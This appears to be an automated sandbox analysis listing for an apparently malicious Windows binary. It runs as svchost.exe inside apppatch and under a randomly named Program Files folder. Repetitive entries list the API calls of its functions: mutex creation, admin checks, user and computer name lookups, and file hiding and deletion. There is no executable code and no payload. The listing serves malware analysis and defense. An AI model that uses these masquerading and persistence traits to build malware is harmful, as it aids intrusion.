      Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,1_2_02D21170
      Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,1_2_02D41160
      Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,1_2_02D43910
      Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,1_2_02D3C900
      Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,1_2_02D21660
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,1_2_02D427C0
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,1_2_02D237E0
      Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,1_2_02D2D7A0
      Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,1_2_02D42750
      Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,1_2_02D40F40
      Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,1_2_02D27D50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_028A67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_028A5230
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_028B3B90
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetUserNameA,memset,StrStrIA,5_2_028AA8E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_028B21E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_028AC900
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_028B3910
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_028B1160
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_02891170
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_02891660
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,5_2_0289D7A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_028B27C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_028937E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_028B0F40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_028B2750
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_02897D50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_024567D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_02455230
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_02463B90
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetUserNameA,memset,StrStrIA,6_2_0245A8E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_02461160
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_02441170
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0245C900
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_02463910
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_024621E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_02441660
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_02460F40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_02462750
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_024627C0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_024437E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,6_2_0244D7A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_02447D50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,8_2_012F67D0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,8_2_01303910
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,8_2_012FC900
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,8_2_01301160
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,8_2_012E1170
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,8_2_013021E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetUserNameA,memset,StrStrIA,8_2_012FA8E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,8_2_01303B90
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,8_2_012F5230
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,8_2_012E7D50
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,StrStrIA,8_2_01302750
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,8_2_01300F40
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,8_2_012ED7A0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,8_2_012E37E0
